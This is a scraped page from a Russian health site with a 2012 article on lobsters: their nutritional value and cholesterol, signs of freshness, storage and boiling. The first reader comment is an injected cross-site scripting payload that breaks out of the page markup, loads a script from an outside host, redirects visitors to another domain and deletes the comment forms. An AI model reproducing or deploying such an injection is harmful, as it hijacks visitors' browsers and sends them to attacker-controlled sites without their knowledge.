Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Учимся есть лобстеров  >>  Учимся есть лобстеров
 
Обратная связь
 

Учимся есть лобстеров

Размер шрифта
15 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Диетическое мясо с опасными свойствами. Как правильно выбрать лобстеров, и как правильно их приготовить?

1

Лобстер – англоязычный синоним омара. Омар (фр.) относится к морским ракообразным. Он и внешне напоминает знакомого нам речного рака, но – в несколько раз больше. Как и все членистоногие, омары имеют внешний скелет в виде толстого панциря, под которым «скрывается» нежное мясо, завоевавшее заслуженную популярность за вкус и аромат.

Помимо вкусовых ценностей, омар представляет собой кладезь микроэлементов и высококачественного белка. Дело в том, что мясо омаров представляет собой почти чистый протеин без углеводов и с низким содержанием жиров. Мясо этих членистоногих можно было бы считать диетическим, если бы не холестерин. Оказывается, холестерин составляет «львиную долю» среди липидов такого мяса. И по содержанию этого опасного компонента морские членистоногие занимают первые места. Всем знакомые креветки – из числа таких «холестериновых чемпионов». Поэтому потреблять морских ракообразных следует с большой осторожностью лицам с болезнями сердца и сосудов.

1

Весьма распространенный, в морских странах, морепродукт, лобстер является дорогостоящим деликатесом в нашей стране. Дело в том, что лобстер – продукт скоропортящийся и транспортировка его на большие расстояния затруднена. Поэтому лучше покупать и хранить лобстеров в замороженном состоянии. Свежих омаров без риска можно приобретать только непосредственно вблизи моря, из которого они были выловлены. В условиях России это можно отнести разве что к Дальнему Востоку. Идеальный вариант – покупать живых лобстеров, подвижность которых и будет неопровержимым доказательством свежести. Еще один важный признак свежести – мягкий панцирь без пятнышек. Отсутствие панциря также должно насторожить покупателя, так как без панциря мясо лобстеров теряет большую часть аромата, а портится еще быстрее. Если всё-таки решились хранить лобстера без заморозки, то - завернув его в морские водоросли и вложив в бумажный пакет.

Готовится лобстер целиком, вместе с панцирем, и варится в течение 5-6 минут. Добавление соли во время варки делает мясо плотным и малосъедобным, поэтому лучше ограничиться добавлением других специй. Интерес представляют клешни и хвост омара, в которых содержится больше всего мяса. Вскрывается панцирь специальными столовыми приборами непосредственно перед тем, как съесть его.


 
Сюжеты по теме:
Очень простое блюдо. Готовим лобстера

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

18 ноября 2015 в 00:27

Цитировать   |   Пожаловаться

Научили как есть лобстеров;)))

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.